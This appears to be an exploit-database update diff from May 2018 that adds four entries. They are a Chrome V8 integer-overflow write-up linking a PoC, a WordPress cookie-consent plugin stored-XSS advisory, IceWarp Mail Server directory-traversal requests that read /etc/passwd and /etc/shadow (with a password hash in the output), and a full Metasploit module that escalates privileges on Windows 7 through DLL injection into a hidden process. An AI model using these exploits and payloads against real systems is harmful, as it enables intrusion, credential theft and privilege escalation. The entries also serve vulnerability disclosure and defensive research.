DB: 2018-05-05

4 changes to exploits/shellcodes

Windows WMI - Recieve Notification Exploit (Metasploit)

Google Chrome V8 - Object Allocation Size Integer Overflow
WordPress Plugin WF Cookie Consent 1.1.3 - Cross-Site Scripting
IceWarp Mail Server < 11.1.1 - Directory Traversal

exploits/multiple/remote/44584.txt

@@ -0,0 +1,74 @@
+There's an integer overflow in computing the required allocation size when instantiating a new javascript object. 
+
+See the following code in objects.cc
+
+// static
+bool JSFunction::CalculateInstanceSizeForDerivedClass(
+    Handle<JSFunction> function, InstanceType instance_type,
+    int requested_embedder_fields, int* instance_size,
+    int* in_object_properties) {
+  Isolate* isolate = function->GetIsolate();
+  int expected_nof_properties = 0;
+  bool result = true;
+  for (PrototypeIterator iter(isolate, function, kStartAtReceiver);
+       !iter.IsAtEnd(); iter.Advance()) {
+    Handle<JSReceiver> current =
+        PrototypeIterator::GetCurrent<JSReceiver>(iter);
+    if (!current->IsJSFunction()) break;
+    Handle<JSFunction> func(Handle<JSFunction>::cast(current));
+    // The super constructor should be compiled for the number of expected
+    // properties to be available.
+    Handle<SharedFunctionInfo> shared(func->shared());
+    if (shared->is_compiled() ||
+        Compiler::Compile(func, Compiler::CLEAR_EXCEPTION)) {
+      DCHECK(shared->is_compiled());
+      expected_nof_properties += shared->expected_nof_properties(); // <--- overflow here!
+    } else if (!shared->is_compiled()) {
+      // In case there was a compilation error for the constructor we will
+      // throw an error during instantiation. Hence we directly return 0;
+      result = false;
+      break;
+    }
+    if (!IsDerivedConstructor(shared->kind())) {
+      break;
+    }
+  }
+  CalculateInstanceSizeHelper(instance_type, true, requested_embedder_fields,
+                              expected_nof_properties, instance_size,
+                              in_object_properties);
+  return result;
+}
+
+By supplying a long prototype chain of objects with a large expected_nof_properties we can control the resulting value of instance_size by causing (requested_embedder_fields + requested_in_object_properties) << kPointerSizeLog2 to be overflown to a small negative value, resulting in an allocation smaller than header_size, which is the minimum required size for the base object class being allocated. This results in memory corruption when the object is initialised/used.
+
+void JSFunction::CalculateInstanceSizeHelper(InstanceType instance_type,
+                                             bool has_prototype_slot,
+                                             int requested_embedder_fields,
+                                             int requested_in_object_properties,
+                                             int* instance_size,
+                                             int* in_object_properties) {
+  int header_size = JSObject::GetHeaderSize(instance_type, has_prototype_slot);
+  DCHECK_LE(requested_embedder_fields,
+            (JSObject::kMaxInstanceSize - header_size) >> kPointerSizeLog2);
+  *instance_size =
+      Min(header_size +
+              ((requested_embedder_fields + requested_in_object_properties)
+               << kPointerSizeLog2),
+          JSObject::kMaxInstanceSize);
+  *in_object_properties = ((*instance_size - header_size) >> kPointerSizeLog2) -
+                          requested_embedder_fields;
+}
+
+The attached PoC crashes current stable on linux.
+
+See crash report ID: 307546648ba8a84a
+
+Chrome issue is https://bugs.chromium.org/p/chromium/issues/detail?id=808192
+
+Attaching the working exploit for this issue.
+
+Note that issue_808192.html is a template - it requires server.py to do a version check and patch a few version dependent constants in, since some object layouts have changed during the range of Chrome versions on which the exploit was tested.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44584.zip

exploits/php/webapps/44585.txt

@@ -0,0 +1,47 @@
+# Exploit Title: WF Cookie Consent - Authenticated Persistent Cross-Site Scripting
+# Date: 23/04/2018
+# Exploit Author: B0UG
+# Vendor Homepage: http://www.wunderfarm.com/
+# Software Link: https://en-gb.wordpress.org/plugins/wf-cookie-consent/
+# Version: Tested on version 1.1.3 (older versions may also be affected)
+# Tested on: WordPress
+# Category : Webapps
+# CVE: CVE-2018-10371
+
+I. VULNERABILITY
+-------------------------
+Authenticated Persistent Cross-Site Scripting
+ 
+II. BACKGROUND
+-------------------------
+WF Cookie Consent is a WordPress plugin which has been designed to display cookie consent notifications on a WordPress website.
+
+III. DESCRIPTION
+-------------------------
+A authenticated persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser.
+
+IV. PROOF OF CONCEPT
+-------------------------
+1) Access WordPress control panel.
+2) Navigate to the 'Pages'.
+3) Add a new page and insert the script you wish to inject into the page title.
+4) Now navigate to 'Settings' and select 'WF Cookie Consent'.
+5) Your injected script will now be executed.
+
+V. IMPACT
+-------------------------
+An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
+ 
+VI. SYSTEMS AFFECTED
+-------------------------
+WordPress websites running "WF Cookie Consent" plugin version 1.1.3 (older versions may also be affected).
+ 
+VII. REMEDIATION
+-------------------------
+Implement a web application such as Wordfence or uninstall the plugin.
+
+VIII. DISCLOSURE TIMELINE
+-------------------------
+April 23, 2018 1: Vulnerability identified.
+April 23, 2018 2: Informed developer of the vulnerability.
+May 2, 2018 3: No reply from the developer.

exploits/php/webapps/44587.txt

@@ -0,0 +1,119 @@
+Vendor: IceWarp (http://www.icewarp.com)
+Product: IceWarp Mail Server
+Version affected: 11.1.1 and below
+
+Product description: 
+IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.
+IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux.
+
+Finding 1: Multiple Unauthenticated Directory traversal
+Credit: Piotr Karolak of Trustwave's SpiderLabs
+CVE: CVE-2015-1503
+CWE: CWE-22
+
+#Proof of Concept
+
+The unauthenticated Directory Traversal vulnerability can be exploited by
+issuing a specially crafted HTTP GET request to the
+/webmail/client/skins/default/css/css.php. Directory Traversal is a
+vulnerability which allows attackers to access restricted directories and
+execute commands outside of the web server's root directory.
+
+This vulnerability affects /-.._._.--.._1416610368(variable, depending on
+the installation, need to check page
+source)/webmail/client/skins/default/css/css.php.
+
+Attack details
+URL GET input file was set to ../../../../../../../../../../etc/passwd
+
+Proof-of-Concept:
+
+The GET or POST request might be sent to the host A.B.C.D where the IceWarp mail server is running:
+
+REQUEST
+=======
+GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1
+Referer: http://a.b.c.d/
+Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
+Host: a.b.c.d
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+Accept: */*
+
+
+RESPONSE:
+=========
+root:x:0:0:root:/root:/bin/bash 
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
+bin:x:2:2:bin:/bin:/usr/sbin/nologin 
+
+....TRUNCATED
+
+test:x:1000:1000:test,,,:/home/test:/bin/bash 
+smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false 
+smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false 
+mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false 
+
+The above proof-of-concept would retrieve the /etc/passwd file (the
+response in this example has been truncated).
+
+#Proof of Concept
+
+The unauthenticated Directory Traversal vulnerability can be exploited by
+issuing a specially crafted HTTP GET and POST request payload
+..././..././..././..././..././..././..././..././..././..././etc/shadow
+submitted in the script and/or style parameter.  Directory Traversal is a
+vulnerability which allows attackers to access restricted directories and
+execute commands outside of the web server's root directory.
+
+The script and style parameters are vulnerable to path traversal attacks,
+enabling read access to arbitrary files on the server.
+
+REQUEST 1
+=========
+
+GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
+Host: a.b.c.d
+Accept: */*
+Accept-Language: en
+Connection: close
+Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main
+Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en
+
+REQUEST 2
+=========
+
+GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
+Host: a.b.c.d
+Accept: */*
+Accept-Language: en
+Connection: close
+Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en
+
+RESPONSE
+========
+HTTP/1.1 200 OK
+Connection: close
+Server: IceWarp/11.1.1.0
+Date: Thu, 03 Jan 2015 06:44:23 GMT
+Content-type: text/javascript; charset=utf-8
+
+root:!:16436:0:99999:7:::
+daemon:*:16273:0:99999:7:::
+bin:*:16273:0:99999:7:::
+sys:*:16273:0:99999:7:::
+sync:*:16273:0:99999:7:::
+games:*:16273:0:99999:7:::
+man:*:16273:0:99999:7:::
+lp:*:16273:0:99999:7:::
+
+....TRUNCATED
+
+lightdm:*:16273:0:99999:7:::
+colord:*:16273:0:99999:7:::
+hplip:*:16273:0:99999:7:::
+pulse:*:16273:0:99999:7:::
+test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
+smmta:*:16436:0:99999:7:::
+smmsp:*:16436:0:99999:7:::
+mysql:!:16436:0:99999:7:::

exploits/windows_x86-64/local/44586.rb

@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/windows/reflective_dll_injection'
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Windows WMI Recieve Notification Exploit',
+      'Description'     => %q(
+        This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.
+        This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.
+      ),
+      'License'         => MSF_LICENSE,
+      'Author'          => [
+        'smmrootkit',      # crash code
+        'de7ec7ed',        # exploit code
+        'de7ec7ed',        # msf module
+      ],
+      'Arch'            => [ARCH_X64],
+      'Platform'        => 'win',
+      'SessionTypes'    => ['meterpreter'],
+      'DefaultOptions'  => {
+        'EXITFUNC' => 'thread'
+      },
+      'Targets' => [
+        ['Windows 7 SP0/SP1', { 'Arch' => ARCH_X64 }]
+      ],
+      'Payload' => {
+        'Space'       => 4096,
+        'DisableNops' => true
+      },
+      'References' => [
+        ['CVE', '2016-0040'],
+        ['MSB', 'MS16-014'],
+        ['URL', 'https://github.com/de7ec7ed/CVE-2016-0040'],
+        ['URL', 'https://github.com/Rootkitsmm/cve-2016-0040'],
+        ['URL', 'https://technet.microsoft.com/en-us/library/security/ms16-014.aspx']
+      ],
+      'DisclosureDate'  => 'Dec 4 2015',
+      'DefaultTarget'   => 0)
+  )
+  end
+
+  def check
+    # Windows 7 SP0/SP1 (64-bit)
+
+    if sysinfo['OS'] !~ /windows/i
+      return Exploit::CheckCode::Unknown
+    end
+
+    file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("ntoskrnl.exe file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    return Exploit::CheckCode::Safe if build > 7601
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    check_result = check
+    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
+      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
+    end
+
+    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    end
+
+    print_status('Launching notepad to host the exploit...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
+    begin
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      # Reader Sandbox won't allow to create a new process:
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_status('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0040', 'CVE-2016-0040.x64.dll')
+    library_path = ::File.expand_path(library_path)
+
+    print_status("Injecting exploit into #{process.pid}...")
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(process, payload.encoded)
+
+    # invoke the exploit, passing in the address of the payload that
+    # we want invoked on successful exploitation.
+    print_status('Payload injected. Executing exploit...')
+    process.thread.create(exploit_mem + offset, payload_mem)
+
+    print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
+  end
+end

files_exploits.csv

@@ -9700,6 +9700,7 @@ id,file,description,date,author,type,platform,port
 44565,exploits/windows/local/44565.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)",2018-05-02,"Marwan Shamel",local,windows,
 44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows,
 44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
+44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16468,6 +16469,7 @@ id,file,description,date,author,type,platform,port
 44576,exploits/hardware/remote/44576.sh,"GPON Routers - Authentication Bypass / Command Injection",2018-05-03,vpnmentor,remote,hardware,
 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,
 44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows,
+44584,exploits/multiple/remote/44584.txt,"Google Chrome V8 - Object Allocation Size Integer Overflow",2018-05-04,"Google Security Research",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39276,3 +39278,5 @@ id,file,description,date,author,type,platform,port
 44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80
 44580,exploits/hardware/webapps/44580.txt,"DLINK DCS-5020L - Remote Code Execution (PoC)",2018-03-27,"Fidus InfoSecurity",webapps,hardware,
 44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,
+44585,exploits/php/webapps/44585.txt,"WordPress Plugin WF Cookie Consent 1.1.3 - Cross-Site Scripting",2018-05-04,B0UG,webapps,php,
+44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,